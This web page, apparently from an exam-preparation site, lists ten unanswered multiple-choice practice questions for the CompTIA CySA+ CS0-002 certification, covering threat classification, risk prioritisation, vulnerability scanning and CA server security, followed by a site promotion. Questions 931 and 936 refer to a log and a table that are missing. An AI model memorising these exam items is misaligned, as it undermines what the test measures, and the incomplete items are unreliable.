1. Home
  2. CompTIA
  3. CS0-002

CompTIA CS0-002 Online Practice Questions and Exam Preparation

CS0-002 Exam Details

  • Exam Code
    :CS0-002
  • Exam Name
    :CompTIA Cybersecurity Analyst (CySA+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :1059 Q&As
  • Last Updated
    :May 30, 2026

CompTIA CS0-002 Online Questions & Answers

  • Question 931:

    A security analyst is reviewing the following log from an email security service.

    Which of the following BEST describes the reason why the email was blocked?

    A. The To address is invalid.
    B. The email originated from the www.spamfilter.org URL.
    C. The IP address and the remote server name are the same.
    D. The IP address was blacklisted.
    E. The From address is invalid.

  • Question 932:

    A production web server is experiencing performance issues. Upon investigation, new unauthorized applications have been installed and suspicious traffic was sent through an unused port. Endpoint security is not detecting any malware or virus. Which of the following types of threats would this MOST likely be classified as?

    A. Advanced persistent threat
    B. Buffer overflow vulnerability
    C. Zero day
    D. Botnet

  • Question 933:

    An organization has specific technical risk mitigation configurations that must be implemented before a new server can be approved for production Several critical servers were recently deployed with the antivirus missing unnecessary ports disabled and insufficient password complexity.

    Which of the following should the analyst recommend to prevent a recurrence of this risk exposure?

    A. Perform password-cracking attempts on all devices going into production
    B. Perform an Nmap scan on all devices before they are released to production
    C. Perform antivirus scans on all devices before they are approved for production
    D. Perform automated security controls testing of expected configurations pnor to production

  • Question 934:

    A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

    A. Advanced persistent threat
    B. Zero day
    C. Trojan
    D. Logic bomb

  • Question 935:

    An analyst needs to understand how an attacker compromised a server. Which of the following procedures will best deliver the information that is necessary to reconstruct the steps taken by the attacker?

    A. Scan the affected system with an anti-malware tool and check for vulnerabilities with a vulnerability scanner.
    B. Extract the server's system timeline, verifying hashes and network connections during a certain time frame.
    C. Clone the entire system and deploy it in a network segment built for tests and investigations while monitoring the system during a certain time frame.
    D. Clone the server's hard disk and extract all the binary files, comparing hash signatures with malware databases.

  • Question 936:

    An organization has the following risk mitigation policy:

    1.

    Risks with a probability of 95% or greater will be addressed before all others regardless of the impact.

    2.

    All other prioritization will be based on risk value. The organization has identified the following risks:

    Which of the following is the order of priority for risk mitigation from highest to lowest?

    A. A, B, D, C
    B. A, B, C, D
    C. D, A, B, C
    D. D, A, C, B

  • Question 937:

    Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organization's application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan?

    A. Newly discovered PII on a server
    B. A vendor releases a critical patch update
    C. A critical bug fix in the organization's application
    D. False positives identified in production

  • Question 938:

    A manufacturing company has decided to participate in direct sales of its products to consumers. The company decides to use a subdomain of its main site with its existing cloud service provider as the portal for e-commerce. After launch, the site is stable and functions properly, but after a robust day of sales, the site begins to redirect to a competitor's landing page. Which of the following actions should the company's security team take to determine the cause of the issue and minimize the scope of impact?

    A. Engage a third party to provide penetration testing services to see if an exploit can be found
    B. Check DNS records to ensure Cname or alias records are in place for the subdomain
    C. Query the cloud provider to determine the nature of the DNS attack and find out which other clients are affected
    D. Check the DNS records to ensure a correct MX record is established for the subdomain

  • Question 939:

    Risk management wants IT to implement a solution that will permit an analyst to intercept, execute, and analyze potentially malicious files that are downloaded from the Internet. Which of the following would BEST provide this solution?

    A. File fingerprinting
    B. Decomposition of malware
    C. Risk evaluation
    D. Sandboxing

  • Question 940:

    While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certAcate authority that is only used to sign intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Select TWO)

    A. On a private VLAN
    B. Full disk encrypted
    C. Powered off
    D. Backed up hourly
    E. VPN accessible only
    F. Air gapped

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CS0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.